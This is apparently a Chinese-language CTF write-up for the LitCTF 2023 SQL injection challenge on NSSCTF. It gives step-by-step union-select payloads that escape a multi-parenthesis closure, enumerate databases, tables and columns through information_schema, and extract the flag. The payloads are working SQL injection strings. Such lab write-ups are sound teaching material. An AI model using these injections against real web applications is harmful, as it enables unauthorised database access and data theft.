NSSCTF-Web题目19（数据库注入、文件上传、php非法传参）

[[LitCTF 2023]这是什么？SQL ！注一下！](#[LitCTF 2023]这是什么？SQL ！注一下！)

1、题目

2、知识点

3、思路

[[SWPUCTF 2023 秋季新生赛]Pingpingping](#[SWPUCTF 2023 秋季新生赛]Pingpingping)

4、题目

5、知识点

6、思路

[LitCTF 2023]这是什么？SQL ！注一下！

1、题目

2、知识点

数据库注入，联合查询

3、思路

首先，题目有提示我们参数为id，而且告诉我们闭合方式

先正常输入看看回显

加上闭合方式，?id=1))))))

结果没有回显，加上注释符

?id=1))))))--+

结果有正常回显，说明当前的闭合方式是正确的

使用联合查询语句 union select

?id=1)))))) union select 1,2--+

这里有两个回显位置

1、接下来判断库名

?id=1)))))) union select 1,database()--+

得到当前的库名为ctf

2、判断表名，这里要用到group_concat函数，下面会用到concat_ws 或者concat函数，在这里一起说明

group_concat：将group by产生的同一个分组中的值连接起来，返回一个字符串结果，也就是将你要查询的那一列数据展示出来

concat：用于连接字符串的，concat(str1,'分隔符',str2,'分隔符',str3,...)

返回的结果为参数的结果并带有分隔符，

concat_ws:用于连接字符串的，concat('分隔符',str1,str2,str3,...)

这个函数的作用跟上面的concat一样，只不过这个函数可以提前定义好分隔符，不用每个变量后带'分隔符'

判断表名

?id=1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctf' --+

这里的表只有一个，users

3、判断字段名

?id=1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='users' --+

得到三个字段：id,username,password

4、判断值，看看有没有flag

得到所有的信息，发现flag是假的

现在的情况说明flag藏在其他库的表里

那怎么查看其他库名呢？

information_schema这个库就存了所有数据库的信息，里面的SCHEMATA表就存了所有库名

5、查找所有库名

?id=1)))))) union select 1,group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --+

接下来就是找库里的表，然后字段名、然后值，步骤跟上面一下

flag藏在ctftraining这个库里

?id=1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining' --+

得到表名：flag,news,users

语句跟上面的类似，也就改一下值，有哪里不懂的欢迎来问我，我这里直接到最后一步

下面三句都可以得到flag

?id=1)))))) union select 1,concat(flag) from ctftraining.flag --+

?id=1)))))) union select 1,concat_ws(',',flag) from ctftraining.flag --+

?id=1)))))) union select 1,flag from ctftraining.flag --+